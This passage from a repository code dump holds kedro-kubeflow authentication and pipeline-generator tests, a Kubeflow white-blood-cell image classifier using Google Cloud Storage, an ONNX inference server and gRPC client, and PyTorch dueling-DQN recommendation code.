job_spec_path=spec_output.name, time_zone="Etc/UTC", schedule=cron_expression, pipeline_root=f"gs://{self.run_config.root}", enable_caching=False, ) self.log.info("Pipeline scheduled to %s", cron_expression) ``` #### File: kedro-kubeflow/tests/test_auth.py ```python import os import unittest from unittest.mock import patch import responses from google.auth.exceptions import DefaultCredentialsError from kedro_kubeflow.auth import AuthHandler class TestAuthHandler(unittest.TestCase): @patch("google.oauth2.id_token.fetch_id_token") def test_should_error_on_invalid_creds(self, fetch_id_token_mock): # given os.environ["IAP_CLIENT_ID"] = "unittest-client-id" fetch_id_token_mock.side_effect = Exception() with self.assertLogs("kedro_kubeflow.auth", level="ERROR") as cm: # when token = AuthHandler().obtain_id_token() # then assert "Failed to obtain IAP access token" in cm.output[0] # then assert token is None @patch("google.oauth2.id_token.fetch_id_token") def test_should_warn_if_trying_to_use_default_creds( self, fetch_id_token_mock ): # given os.environ["IAP_CLIENT_ID"] = "unittest-client-id" fetch_id_token_mock.side_effect = DefaultCredentialsError() with self.assertLogs("kedro_kubeflow.auth", level="WARNING") as cm: # when token = AuthHandler().obtain_id_token() # then assert ( "this authentication method does not work with default credentials" in cm.output[0] ) assert token is None @patch("google.oauth2.id_token.fetch_id_token") def test_should_provide_valid_token(self, fetch_id_token_mock): # given os.environ["IAP_CLIENT_ID"] = "unittest-client-id" fetch_id_token_mock.return_value = "TOKEN" # when token = AuthHandler().obtain_id_token() # then assert token == "TOKEN" def test_should_skip_dex_auth_if_env_is_not_set(self): # given # no env set # when session = AuthHandler().obtain_dex_authservice_session(None) # then assert session is None def test_should_skip_dex_auth_if_env_is_incomplete(self): # given os.environ["DEX_USERNAME"] = "<EMAIL>" # no password set # when session = AuthHandler().obtain_dex_authservice_session(None) # then assert session is None def tearDown(self): if "DEX_USERNAME" in os.environ: del os.environ["DEX_USERNAME"] if "DEX_PASSWORD" in os.environ: del os.environ["DEX_PASSWORD"] if "IAP_CLIENT_ID" in os.environ: del os.environ["IAP_CLIENT_ID"] @responses.activate def test_should_get_cookie_from_dex_secured_system(self): # given os.environ["DEX_USERNAME"] = "<EMAIL>" os.environ["DEX_PASSWORD"] = "pa$$" responses.add( responses.GET, "https://kubeflow.local/pipeline", body='<a href="/dex/auth/local?req=qjrrnpg3hngdu6odii3hcmfae" target="_self"', ) responses.add( responses.POST, "https://kubeflow.local/dex/auth/local?req=qjrrnpg3hngdu6odii3hcmfae", headers={"Set-cookie": "authservice_session=sessionID"}, ) # when session = AuthHandler().obtain_dex_authservice_session( "https://kubeflow.local/pipeline" ) # then assert session == "sessionID" assert ( responses.calls[1].request.body == "login=user%40example.com&password=pa%24%24" ) ``` #### File: kedro-kubeflow/tests/test_one_pod_pipeline_generator.py ```python import os import unittest from inspect import signature from unittest.mock import MagicMock import kfp from kedro.pipeline import Pipeline, node from kedro_kubeflow.config import PluginConfig from kedro_kubeflow.generators.one_pod_pipeline_generator import ( OnePodPipelineGenerator, ) def identity(input1: str): return input1 # pragma: no cover class TestGenerator(unittest.TestCase): def test_support_modification_of_pull_policy(self): # given self.create_generator() # when with kfp.dsl.Pipeline(None) as dsl_pipeline: self.generator_under_test.generate_pipeline( "pipeline", "unittest-image", "Never" )() # then assert len(dsl_pipeline.ops) == 1 assert dsl_pipeline.ops["pipeline"].container.image == "unittest-image" assert ( dsl_pipeline.ops["pipeline"].container.image_pull_policy == "Never" ) def test_should_support_params_and_inject_them_to_the_node(self): # given self.create_generator(params={"param1": 0.3, "param2": 42}) # when with kfp.dsl.Pipeline(None) as dsl_pipeline: pipeline = self.generator_under_test.generate_pipeline( "pipeline", "unittest-image", "Always" ) default_params = signature(pipeline).parameters pipeline() # then assert len(default_params) == 2 assert default_params["param1"].default == 0.3 assert default_params["param2"].default == 42 assert dsl_pipeline.ops["pipeline"].container.args[1:] == [ "param1", "{{pipelineparam:op=;name=param1}}", "param2", "{{pipelineparam:op=;name=param2}}", ] def test_should_not_add_resources_spec_if_not_requested(self): # given self.create_generator(config={}) # when with kfp.dsl.Pipeline(None) as dsl_pipeline: self.generator_under_test.generate_pipeline( "pipeline", "unittest-image", "Always" )() # then assert dsl_pipeline.ops["pipeline"].container.resources is None def test_should_add_resources_spec(self): # given self.create_generator( config={ "resources": { "__default__": {"cpu": "100m", "memory": "8Gi"}, "node1": {"cpu": "400m", "memory": "64Gi"}, } } ) # when with kfp.dsl.Pipeline(None) as dsl_pipeline: self.generator_under_test.generate_pipeline( "pipeline", "unittest-image", "Always" )() # then resources = dsl_pipeline.ops["pipeline"].container.resources assert resources.limits == {"cpu": "100m", "memory": "8Gi"} assert resources.requests == {"cpu": "100m", "memory": "8Gi"} def test_should_set_description(self): # given self.create_generator(config={"description": "DESC"}) # when pipeline = self.generator_under_test.generate_pipeline( "pipeline", "unittest-image", "Never" ) # then assert pipeline._component_description == "DESC" def test_artifact_registration(self): # given self.create_generator( catalog={ "B": { "type": "pandas.CSVDataSet", "filepath": "data/02_intermediate/b.csv", } } ) # when with kfp.dsl.Pipeline(None) as dsl_pipeline: self.generator_under_test.generate_pipeline( "pipeline", "unittest-image", "Always" )() # then assert dsl_pipeline.ops["pipeline"].file_outputs == { "B": "/home/kedro/data/02_intermediate/b.csv" } def test_should_skip_artifact_registration_if_requested(self): # given self.create_generator( catalog={ "B": { "type": "pandas.CSVDataSet", "filepath": "data/02_intermediate/b.csv", } }, config={"store_kedro_outputs_as_kfp_artifacts": False}, ) # when with kfp.dsl.Pipeline(None) as dsl_pipeline: self.generator_under_test.generate_pipeline( "pipeline", "unittest-image", "Always" )() # then assert dsl_pipeline.ops["pipeline"].file_outputs == {} def test_should_pass_kedro_config_env_to_nodes(self): # given self.create_generator(params={"param1": 0.3, "param2": 42}) os.environ["KEDRO_CONFIG_MY_KEY"] = "42" os.environ["SOME_VALUE"] = "100" try: # when with kfp.dsl.Pipeline(None) as dsl_pipeline: self.generator_under_test.generate_pipeline( "pipeline", "unittest-image", "Always" )() # then env_values = { e.name: e.value for e in dsl_pipeline.ops["pipeline"].container.env } assert "KEDRO_CONFIG_MY_KEY" in env_values assert env_values["KEDRO_CONFIG_MY_KEY"] == "42" assert "SOME_VALUE" not in env_values finally: del os.environ["KEDRO_CONFIG_MY_KEY"] del os.environ["SOME_VALUE"] def test_should_pass_kubeflow_run_id_to_nodes(self): # given self.create_generator(params={"param1": 0.3, "param2": 42}) # when with kfp.dsl.Pipeline(None) as dsl_pipeline: self.generator_under_test.generate_pipeline( "pipeline", "unittest-image", "Always" )() # then env_values = { e.name: e.value for e in dsl_pipeline.ops["pipeline"].container.env } assert "KUBEFLOW_RUN_ID" in env_values assert env_values["KUBEFLOW_RUN_ID"] == "{{workflow.uid}}" def create_generator(self, config=None, params=None, catalog=None): if config is None: config = {} if params is None: params = {} if catalog is None: catalog = {} config_loader = MagicMock() config_loader.get.return_value = catalog context = type( "obj", (object,), { "env": "unittests", "params": params, "config_loader": config_loader, "pipelines": { "pipeline": Pipeline( [ node(identity, "A", "B", name="node1"), node(identity, "B", "C", name="node2"), ] ) }, }, ) self.generator_under_test = OnePodPipelineGenerator( config=PluginConfig( {"host": "http://unittest", "run_config": config} ), project_name="my-awesome-project", context=context, ) ```
{ "source": "0shimax/Kftest", "score": 2 }
#### File: src/feature/metric_data_loader.py ```python from pathlib import Path import random import numpy import torch from torchvision import datasets, transforms from torch.utils.data import Dataset from PIL import Image import multiprocessing from feature.utils import ImageTransform, GcsIO class WBCDataset(Dataset): def __init__(self, n_class, image_labels, root_dir, subset="Dataset1", transform=ImageTransform(), project="<your project id>", bucket_name="kf-test1234", train=True): super().__init__() self.image_labels = image_labels self.root_dir = root_dir self.subset = subset self.gcs_io = GcsIO(project, bucket_name) self.transform = transform self.n_class = n_class self.train = train self.n_relation = self.n_class**2 def __len__(self): return len(self.image_labels) def __getitem__(self, idx): img_name, label = self.image_labels[idx] image = self._read_image(img_name) image = self.transform(image) if self.train: near_image = self._get_near_image(label) far_image, far_label = self._get_far_image_and_label(label) near_relational_tag = label*(self.n_class-1) + label far_relational_tag = label*(self.n_class-1) + far_label label = torch.LongTensor([label]) far_label = torch.LongTensor([far_label]) near_relational_tag = torch.LongTensor([near_relational_tag]) far_relational_tag = torch.LongTensor([far_relational_tag]) return image, label, near_image, label, far_image, far_label, near_relational_tag, far_relational_tag else: return image, label def _get_far_image_and_label(self, near_category): idxs = numpy.where(self.image_labels[:,1]!=near_category)[0] random.shuffle(idxs) idx = idxs[0] img_name, label = self.image_labels[idx] image = self._read_image(img_name) image = self.transform(image) return image, label def _get_near_image(self, near_category): idxs = numpy.where(self.image_labels[:,1]==near_category)[0] random.shuffle(idxs) idx = idxs[0] img_name = self.image_labels[idx][0] image = self._read_image(img_name) return self.transform(image) def _read_image(self, img_name): image_path = '/'.join([self.root_dir, self.subset, "{0:03}.bmp".format(img_name)]) image = self.gcs_io.load_image(image_path) return image def loader(dataset, batch_size, shuffle=True): loader = torch.utils.data.DataLoader( dataset, batch_size=batch_size, shuffle=shuffle, num_workers=multiprocessing.cpu_count()) return loader ``` #### File: src/feature/utils.py ```python import io from torchvision import transforms from google.cloud import storage from pathlib import Path from PIL import Image class ImageTransform(object): def __init__(self): pass def __call__(self, x): normalize = transforms.Normalize(mean=[0.485, 0.456, 0.406], std=[0.229, 0.224, 0.225]) transform = transforms.Compose( # [transforms.Resize(256), # transforms.CenterCrop(224), [transforms.Resize(76), transforms.CenterCrop(64), transforms.ToTensor(), normalize, ]) return transform(x) class GcsIO(object): def __init__(self, project, bucket_name): self.PROJECT = project self.BUCKET_NAME = bucket_name def upload_file(self, gcs_path, local_path): client = storage.Client(self.PROJECT) bucket = client.get_bucket(self.BUCKET_NAME) blob = bucket.blob(gcs_path) blob.upload_from_filename(local_path) def download_file(self, gcs_path, local_path): p_path = Path(local_path).parent if not p_path.exists(): p_path.mkdir(parents=True) client = storage.Client(self.PROJECT) bucket = client.get_bucket(self.BUCKET_NAME) blob = bucket.blob(gcs_path) blob.download_to_filename(local_path) def load_image(self, gcs_path): client_storage = storage.Client(self.PROJECT) bucket = client_storage.get_bucket(self.BUCKET_NAME) blob = bucket.blob(gcs_path) img = Image.open(io.BytesIO(blob.download_as_string())) return img ``` #### File: Kftest/src/test.py ```python from pathlib import Path import argparse import collections import json import numpy import torch import torch.nn as nn import torch.nn.functional as F import pandas from sklearn.metrics import accuracy_score, confusion_matrix from google.cloud import storage from model.trans_NFCM import TransNFCM from optimizer.radam import RAdam from feature.metric_data_loader import WBCDataset, loader from metric.utils import cossim, val torch.manual_seed(555) device = torch.device("cuda" if torch.cuda.is_available() else "cpu") print("device:", device) idx2label = {0:"Lymphocyte", 1:"Monocyte", 2:"Nuetrophil", 3:"Eosinophil", 4:"Basophil"} def main(args): n_relational_embeddings = args.n_class**2 n_tag_embeddings = args.n_class in_ch, out_ch, emb_dim = 3, 128, 128 model = TransNFCM(in_ch, out_ch, n_relational_embeddings, n_tag_embeddings, embedding_dim=emb_dim).to(device) image_label = pandas.read_csv( Path("gs://", args.bucket_name, args.data_root, args.metadata_file_name.format(args.subset)) ) image_label = image_label.sample(frac=1, random_state=551) image_label["class"] = image_label["class"] - 1 image_label = image_label.values val_dataset = WBCDataset(args.n_class, image_label[:250], args.data_root, project=args.project, bucket_name=args.bucket_name, subset=args.subset, train=False) test_dataset = WBCDataset(args.n_class, image_label[250:], args.data_root, project=args.project, bucket_name=args.bucket_name, subset=args.subset, train=False) val_loader = loader(val_dataset, 1, shuffle=False) test_loader = loader(test_dataset, 1, shuffle=False) test_loader.dataset.gcs_io.download_file(args.resume_model, args.out_dir+"/"+args.resume_model.split("/")[-1]) if Path(args.resume_model).exists(): print("load model:", args.resume_model) model.load_state_dict(torch.load(args.resume_model)) center_vec = val(args, model, val_loader, emb_dim=emb_dim) test(args, model, test_loader, center_vec) def test(args, model, data_loader, center_vec): model.eval() label_idxs = [] result_labels = [] with torch.no_grad(): for i, (image, cat) in enumerate(data_loader): image = image.to(device) cat = cat.to(device) label_idxs.append(cat.item()) image_embedded_vec = model.predict(x=image, category=None) vec = F.softmax(image_embedded_vec, dim=1).squeeze(0).numpy() result_labels.append(cossim(vec, center_vec)) write_metric(args, label_idxs, result_labels, args.n_class, list(idx2label.values()), data_loader.dataset.gcs_io) print("done") def write_metric(args, target, predicted, n_class, class_names, gcs_io, cm_file='confusion_matrix.csv'): cm = confusion_matrix(target, predicted, labels=list(range(n_class))) accuracy = accuracy_score(target, predicted) data = [] for target_index, target_row in enumerate(cm): for predicted_index, count in enumerate(target_row): data.append((class_names[target_index], class_names[predicted_index], count)) df_cm = pandas.DataFrame(data, columns=['target', 'predicted', 'count']) cm_file_path = '/'.join([args.out_dir, cm_file]) with open(cm_file_path, 'w') as f: df_cm.to_csv(f, columns=['target', 'predicted', 'count'], header=False, index=False) gcs_io.upload_file('{}/{}'.format(args.out_dir, cm_file), cm_file_path) metadata = { 'outputs': [{ 'type': 'confusion_matrix', 'format': 'csv', 'schema': [ {'name': 'target', 'type': 'CATEGORY'}, {'name': 'predicted', 'type': 'CATEGORY'}, {'name': 'count', 'type': 'NUMBER'}, ], 'source': 'gs://{}/{}/{}'.format(args.bucket_name, args.out_dir, cm_file), 'labels': class_names, }] } # meta dataをjsonに書き出し、DSLでfile_outputsに指定することでUIからConfusion Matrixを確認できる with open(args.out_dir+'/mlpipeline-ui-metadata.json', 'w') as f: json.dump(metadata, f) metrics = { 'metrics': [{ 'name': 'accuracy-score', # The name of the metric. Visualized as the column name in the runs table. 'numberValue': accuracy, # The value of the metric. Must be a numeric value. 'format': "PERCENTAGE", # The optional format of the metric. Supported values are "RAW" (displayed in raw format) and "PERCENTAGE" (displayed in percentage format). }] } with open(args.out_dir+'/mlpipeline-metrics.json', 'w') as f: json.dump(metrics, f) if __name__ == '__main__': parser = argparse.ArgumentParser() parser.add_argument('--data-root', default="data/segmentation_WBC-master") parser.add_argument('--metadata-file-name', default="Class_Labels_of_{}.csv") parser.add_argument('--subset', default="Dataset1") parser.add_argument('--project', default="<your project id>") parser.add_argument('--bucket-name', default="kf-test1234") parser.add_argument('--n-class', type=int, default=5, help='number of class') parser.add_argument('--resume-model', default='export/wbc/NFCM_model.pth', help='path to trained model') parser.add_argument('--out-dir', default='export/wbc', help='folder to output data and model checkpoints') args = parser.parse_args() Path(args.out_dir).mkdir(parents=True, exist_ok=True), main(args) ``` #### File: Kftest/src/train.py ```python from pathlib import Path import argparse import collections import numpy import torch import torch.nn as nn import torch.nn.functional as F import pandas from google.cloud import storage from model.trans_NFCM import TransNFCM from optimizer.radam import RAdam from feature.metric_data_loader import WBCDataset, loader from feature.utils import GcsIO torch.manual_seed(555) device = torch.device("cuda" if torch.cuda.is_available() else "cpu") print("device:", device) idx2label = {0:"Lymphocyte", 1:"Monocyte", 2:"Nuetrophil", 3:"Eosinophil", 4:"Basophil"} def main(args): n_relational_embeddings = args.n_class**2 n_tag_embeddings = args.n_class in_ch, out_ch, emb_dim = 3, 128, 128 model = TransNFCM(in_ch, out_ch, n_relational_embeddings, n_tag_embeddings, embedding_dim=emb_dim).to(device) optimizer = RAdam(model.parameters(), weight_decay=1e-3) image_label = pandas.read_csv( Path("gs://", args.bucket_name, args.data_root, args.metadata_file_name.format(args.subset)) ) image_label = image_label.sample(frac=1, random_state=551) image_label["class"] = image_label["class"] - 1 image_label = image_label.values train_dataset = WBCDataset(args.n_class, image_label[:250], args.data_root, project=args.project, bucket_name=args.bucket_name, subset=args.subset, train=True) train_loader = loader(train_dataset, args.batch_size) train(args, model, optimizer, train_loader) def train(args, model, optimizer, data_loader, model_name="NFCM_model.pth"): model.train() for epoch in range(args.epochs): for i, (image, cat, near_image, near_cat, far_image, far_cat, near_relation, far_relation) in enumerate(data_loader): image = image.to(device) cat = cat.to(device) near_image = near_image.to(device) near_cat = near_cat.to(device) far_image = far_image.to(device) far_cat = far_cat.to(device) near_relation = near_relation.to(device) far_relation = far_relation.to(device) model.zero_grad() optimizer.zero_grad() loss = model(image, near_image, image, far_image, cat, near_cat, cat, far_cat, near_relation, far_relation).sum() loss.backward() optimizer.step() print('[{}/{}][{}/{}] Loss: {:.4f}'.format( epoch, args.epochs, i, len(data_loader), loss.item())) model_path = args.out_dir+"/"+model_name torch.save(model.state_dict(), model_path) data_loader.dataset.gcs_io.upload_file(model_path, model_path) if __name__ == '__main__': parser = argparse.ArgumentParser() parser.add_argument('--data-root', default="data/segmentation_WBC-master") parser.add_argument('--metadata-file-name', default="Class_Labels_of_{}.csv") parser.add_argument('--subset', default="Dataset1") parser.add_argument('--project', default="<your project id>") parser.add_argument('--bucket-name', default="kf-test1234") parser.add_argument('--n-class', type=int, default=5, help='number of class') parser.add_argument('--batch-size', type=int, default=32, help='input batch size') parser.add_argument('--epochs', type=int, default=30, help='number of epochs to train for') parser.add_argument('--out-dir', default='export/wbc', help='folder to output data and model checkpoints') args = parser.parse_args() Path(args.out_dir).mkdir(parents=True, exist_ok=True), main(args) ```
{ "source": "0shimax/load-testing-of-api-server", "score": 2 }
#### File: fastapi_server/app/prediction.py ```python from typing import ByteString import botocore from logging import getLogger import onnxruntime as rt from models import Features from models import PredictionResult logger = getLogger("uvicorn.access") class Classifier(object): session = None float_input_name = None categorical_input_name = None label_name = None def __init__( self, s3_client: botocore.client.BaseClient = None, s3_bucket: str = None, s3_bucket_key: str = None, model_file_path: str = None ): logger.info("Initializing model...") self.s3_client = s3_client self.s3_bucket = s3_bucket self.s3_bucket_key = s3_bucket_key self.model_file_path = model_file_path self.load_model() def _read_model_from_s3(self) -> ByteString: return self.s3_client.get_object( Bucket=self.s3_bucket, Key=self.s3_bucket)["Body"] def _build_session(self) -> rt.InferenceSession: if self.s3_bucket: logger.info("Fetching model file from S3...") return rt.InferenceSession(self._read_model_from_s3()) else: logger.info("Fetching model file from Local...") return rt.InferenceSession(self.model_file_path) def load_model(self) -> None: logger.info("Loading model...") logger.info("Building session...") self.session = self._build_session() logger.info("Session build Done.") self.float_input_name = self.session.get_inputs()[0].name self.categorical_input_name = self.session.get_inputs()[1].name self.label_name = self.session.get_outputs()[1].name logger.info("Model load Done.") def predict(self, data: Features) -> PredictionResult: inputs = { self.float_input_name: Features.to_numpy(data.float_features), self.categorical_input_name: Features.to_numpy(data.categorical_features), } predicted = self.session.run([self.label_name], inputs)[0] return PredictionResult(**{"predicted": [v[1] for v in predicted]}) ``` #### File: app/ml/client.py ```python import asyncio import logging import grpc from onnxGrpcServer_pb2 import Features, UpdateParams from onnxGrpcServer_pb2_grpc import CTCVInferenceServicerStub import input_data import time async def request(stub, payloads): start = time.perf_counter() responses = stub.Predict(iter(payloads)) while True: response = await responses.read() if response == grpc.aio.EOF: break # print(f"responce: {response.prob}") print("net time[ms]:", time.perf_counter() - start) async def run(): async with grpc.aio.insecure_channel('localhost:50051') as channel: stub = CTCVInferenceServicerStub(channel) payloads = [] for i in range(10): payloads.append(Features(**input_data.features_one[i%2])) await request(stub, payloads) async def update(): async with grpc.aio.insecure_channel('localhost:50051') as channel: stub = CTCVInferenceServicerStub(channel) res = stub.UpdateModel(UpdateParams(param="updating")) while True: response = await res if response == grpc.aio.EOF: break print(res) if __name__ == '__main__': logging.basicConfig() asyncio.run(run()) # asyncio.run(update()) ```
{ "source": "0shimax/Pytorch-DRN", "score": 3 }
#### File: src/feature/eme_data_loader.py ```python from pathlib import Path import pandas as pd import numpy as np import random import torch from torch.utils.data import Dataset from sklearn.model_selection import train_test_split def get_id_columns(df): user_and_target_id_columns = ["user_id", "target_user_id"] return df[user_and_target_id_columns] def extranct_interacted_user_rows(df): tmp = df[["user_id", "label"]].groupby('user_id').sum() interacted_user_id = tmp[tmp.label>0].reset_index() return df[df.user_id.isin(interacted_user_id.user_id)] def get_ethnicity_columns(df): ethnicity_user = df.ethnicity_user ethnicity_target = df.ethnicity_target ethnicity_columns = [c for c in df.columns if "ethnicity_" in c] df.drop(ethnicity_columns, axis=1, inplace=True) df = df.assign(ethnicity_user=ethnicity_user, ethnicity_target=ethnicity_target) return df def calculate_user_features(df): c_id = 'user_id' user_feature_columns = [c for c in df.columns if '_user' in c and 'target_user_id' != c] user_features = df.groupby(c_id)[user_feature_columns].head(1) user_features[c_id] = df.loc[user_features.index].user_id return user_features def calculate_target_features(df): c_id = 'target_user_id' target_feature_columns =\ [c for c in df.columns.values if '_target' in c] target_features = df[[c_id] + target_feature_columns] return target_features def calcurate_target_clicked(df): result = df[['target_user_id', 'label']]\ .groupby('target_user_id')\ .agg(['sum', 'count'])\ .reset_index() result.columns = ['target_user_id', 'label_sum', 'label_cnt'] result = result.assign(label_rate=result.label_sum/result.label_cnt) result.index = df.groupby('target_user_id').head(1).index return result def get_target_ids_for_train_input(squewed_user_target_labels, valued_target_idxs, n_high, n_low): # 全て返す return squewed_user_target_labels.index.values n_total = n_high + n_low high_rate_flag = squewed_user_target_labels.label > 0 if len(valued_target_idxs) >= n_total: idxs = np.random.permutation(len(valued_target_idxs))[:n_total] return valued_target_idxs[idxs] query = ~squewed_user_target_labels.index.isin(valued_target_idxs) query &= high_rate_flag n_rest = n_total - len(valued_target_idxs) if n_rest == 1: hight = squewed_user_target_labels[query].sample(n_rest).index.values return np.concatenate([valued_target_idxs, hight]) m_n_high = int(n_rest * n_high / n_total) m_n_low = n_rest - m_n_high hight = squewed_user_target_labels[query].sample(m_n_high, replace=True).index.values low = squewed_user_target_labels[ squewed_user_target_labels.label == 0].sample(m_n_low, replace=True).index.values idxs = np.concatenate([valued_target_idxs, hight, low]) return idxs def get_target_ids_for_test_input(squewed_user_target_labels, n_high, n_low): # 全て返す return squewed_user_target_labels.index.values n_total = n_high + n_low high_rate_flag = squewed_user_target_labels.label > 0 if sum(high_rate_flag) < n_high: hight = squewed_user_target_labels[high_rate_flag].index.values n_low = n_total - sum(high_rate_flag) else: hight = squewed_user_target_labels[high_rate_flag].sample(n_high).index.values low = squewed_user_target_labels[ squewed_user_target_labels.label == 0].sample(n_low, replace=True).index.values idxs = np.concatenate([hight, low]) return idxs def get_target_ids_for_input(squewed_user_target_labels, valued_target_idxs, n_high, n_low, train=True): if train: return get_target_ids_for_train_input(squewed_user_target_labels, valued_target_idxs, n_high, n_low) else: return get_target_ids_for_test_input(squewed_user_target_labels, n_high, n_low) class OwnDataset(Dataset): def __init__(self, file_name, root_dir, n_high, n_low, subset=False, transform=None, train=True, split_seed=555): super().__init__() print("Train:", train) self.file_name = file_name self.root_dir = root_dir self.transform = transform self.n_high = n_high self.n_low = n_low self._train = train self.split_seed = split_seed self.prepare_data() self.user_features_orig = self.user_features def __len__(self): return len(self.user_and_target_ids) def reset(self): self.user_features = self.user_features_orig def prepare_data(self): data_path = Path(self.root_dir, self.file_name) eme_data = pd.read_csv(data_path) extracted_interacted_rows = extranct_interacted_user_rows(eme_data) unique_user_ids = extracted_interacted_rows.user_id.unique() train_user_ids, test_user_ids = train_test_split(unique_user_ids, random_state=self.split_seed, shuffle=True, test_size=0.2) if self._train: _data = eme_data[eme_data.user_id.isin(train_user_ids)] self.user_features = calculate_user_features(_data) self.user_and_target_ids = get_id_columns(_data) self.rewards = eme_data[["user_id", "target_user_id", "label"]] self.target_features_all = calculate_target_features(eme_data) # _data else: _data = eme_data[eme_data.user_id.isin(test_user_ids)] self.user_and_target_ids = get_id_columns(_data) self.user_features = calculate_user_features(_data) self.rewards = eme_data[["user_id", "target_user_id", "label"]] self.target_features_all = calculate_target_features(eme_data) print("user", self.user_features.shape) print("target", len(self.target_features_all.target_user_id.unique())) def __getitem__(self, idx): ids = self.user_and_target_ids.iloc[idx].values current_user_id = ids[0] user_feature = self.user_features[self.user_features.user_id == current_user_id] user_feature = user_feature.copy().drop("user_id", axis=1) user_feature = user_feature.astype(np.float32).values user_feature = user_feature.reshape(-1) query = (self.rewards.user_id == current_user_id) query &= (self.rewards.label == 1) valued_target_idxs = self.rewards[query].index.values # TODO: 後で名前変えたる squewed_user_target_labels =\ self.rewards.groupby("target_user_id").head(1) target_idxs = get_target_ids_for_input( squewed_user_target_labels, valued_target_idxs, self.n_high, self.n_low, self._train) target_features = self.target_features_all.loc[target_idxs].copy().reindex() target_ids = target_features.target_user_id.values target_features =\ target_features.copy().drop("target_user_id", axis=1) target_features = target_features.astype(np.float32).values eliminate_teacher = self.target_features_all.loc[valued_target_idxs].copy().reindex() eliminate_teacher_ids = eliminate_teacher.target_user_id.values eliminate_teacher_val = target_ids == eliminate_teacher_ids[0] for v in eliminate_teacher_ids[1:]: eliminate_teacher_val += target_ids == v eliminate_teacher_val = eliminate_teacher_val.astype(np.float32) return (torch.FloatTensor(user_feature), torch.FloatTensor(target_features), current_user_id, target_ids, eliminate_teacher_val) def get_reward(self, current_user_id, target_ids): query_user = self.rewards.user_id == current_user_id query_target = self.rewards.target_user_id.isin(target_ids) query = (query_user) & (query_target) reward = self.rewards[query].label.values if len(reward) == 0: return 0. else: return float(reward.max()) def loader(dataset, batch_size, shuffle=True): loader = torch.utils.data.DataLoader( dataset, batch_size=batch_size, shuffle=shuffle, num_workers=0) return loader ``` #### File: src/model/ddqn_for_all.py ```python import torch import torch.nn as nn from model.swichable_normalization import SwitchNorm1d def inner(aa, bb): return (aa * bb.unsqueeze(dim=1).expand(aa.shape)).sum(dim=2) class ValueNet(nn.Module): def __init__(self, dim_in, action_num): super().__init__() self.fcb1 = nn.Sequential( nn.Linear(dim_in, 64), # SwitchNorm1d(192), nn.ReLU()) self.fcb2 = nn.Sequential( nn.Linear(64, 128), # SwitchNorm1d(64), nn.ReLU()) self.fcb3 = nn.Sequential( nn.Linear(256*4, 256*6), # SwitchNorm1d(64), nn.ReLU()) self.fc1 = nn.Linear(128, 128) def forward(self, user_feature): h = self.fcb1(user_feature) h = self.fcb2(h) # h = self.fcb3(h) out = self.fc1(h) return out class AdvantageNet(nn.Module): def __init__(self, dim_in, action_num): super().__init__() self.n_out_vec = 128 self.fcb1 = nn.Sequential( nn.Linear(dim_in*2, 128), # SwitchNorm1d(128), nn.ReLU()) self.fcb2 = nn.Sequential( nn.Linear(128, 128), # SwitchNorm1d(64), nn.ReLU()) self.fcb3 = nn.Sequential( nn.Linear(64, 32), # SwitchNorm1d(64), nn.ReLU()) self.fc1 = nn.Linear(128, self.n_out_vec) def forward(self, user_feature, target_features): # print(user_feature.shape, target_features.shape) n_bach, n_feature = user_feature.shape expanded_shape = list(target_features.shape[:2])+[user_feature.shape[-1]] uf = user_feature.unsqueeze(dim=1).expand(expanded_shape) n_features = target_features.shape[-1] + user_feature.shape[-1] # print(uf.shape, target_features.shape, n_features) x = torch.cat([uf, target_features], dim=2).view(-1, n_features) h = self.fcb1(x) h = self.fcb2(h) # h = self.fcb3(h) out = self.fc1(h) return out.view(n_bach, -1, self.n_out_vec) class Model(nn.Module): """ dueling network """ def __init__(self, dim_in, action_num): super().__init__() self.value_net = ValueNet(dim_in, action_num) self.advantage_net = AdvantageNet(dim_in, action_num) def forward(self, observation, target_features): # user_feature, content_id = observation user_feature = observation v = self.value_net(user_feature) a = self.advantage_net(user_feature, target_features) q = inner(a, v) # print("q:", q.shape) return q.view(q.size(0), -1) def save(self, path, step, optimizer): torch.save({ 'step': step, 'state_dict': self.state_dict(), 'optimizer': optimizer.state_dict() }, path) def load(self, checkpoint_path, optimizer=None): checkpoint = torch.load(checkpoint_path) step = checkpoint['step'] self.load_state_dict(checkpoint['state_dict']) if optimizer is not None: optimizer.load_state_dict(checkpoint['optimizer']) ``` #### File: src/model/ddqn.py ```python import torch import torch.nn as nn from model.swichable_normalization import SwitchNorm1d class ValueNet(nn.Module): def __init__(self, dim_in, action_num): super().__init__() h_dim = action_num self.fcb1 = nn.Sequential( nn.Linear(dim_in, h_dim), # SwitchNorm1d(h_dim), nn.ReLU()) self.fcb1_1 = nn.Sequential( nn.Linear(256, 256*2), # SwitchNorm1d(192), nn.ReLU()) self.fcb2 = nn.Sequential( nn.Linear(h_dim, h_dim), # SwitchNorm1d(h_dim), nn.ReLU()) self.fcb3 = nn.Sequential( nn.Linear(h_dim, h_dim), # SwitchNorm1d(h_dim), nn.ReLU()) self.fc1 = nn.Linear(h_dim, action_num) def forward(self, user_feature): h = self.fcb1(user_feature) # h = self.fcb1_1(h) h = self.fcb2(h) h = self.fcb3(h) out = self.fc1(h) return out class AdvantageNet(nn.Module): def __init__(self, dim_in, action_num): super().__init__() self.fcb1 = nn.Sequential( nn.Linear(dim_in*2, 128), # SwitchNorm1d(128), nn.ReLU()) self.fcb2 = nn.Sequential( nn.Linear(128, 64), # SwitchNorm1d(64), nn.ReLU()) self.fcb3 = nn.Sequential( nn.Linear(64, 32), # SwitchNorm1d(32), nn.ReLU()) self.fc1 = nn.Linear(32, 1) def forward(self, user_feature, target_features): n_bach, n_feature = user_feature.shape expanded_shape = list(target_features.shape[:2])+[user_feature.shape[-1]] uf = user_feature.unsqueeze(dim=1).expand(expanded_shape) n_features = target_features.shape[-1] + user_feature.shape[-1] # print(uf.shape, target_features.shape, n_features) x = torch.cat([uf, target_features], dim=2).view(-1, n_features) h = self.fcb1(x) h = self.fcb2(h) h = self.fcb3(h) out = self.fc1(h) return out.view(n_bach, -1) class Model(nn.Module): """ dueling network """ def __init__(self, dim_in, action_num): super().__init__() self.value_net = ValueNet(dim_in, action_num) self.advantage_net = AdvantageNet(dim_in, action_num) def forward(self, user_feature, target_features): # print(user_feature.shape, target_features.shape) v = self.value_net(user_feature) a = self.advantage_net(user_feature, target_features) q = v + (a - a.mean(dim=0)) return q.view(q.size(0), -1) def save(self, path, step, optimizer): torch.save({ 'step': step, 'state_dict': self.state_dict(), 'optimizer': optimizer.state_dict() }, path) def load(self, checkpoint_path, optimizer=None): checkpoint = torch.load(checkpoint_path) step = checkpoint['step'] self.load_state_dict(checkpoint['state_dict']) if optimizer is not None: 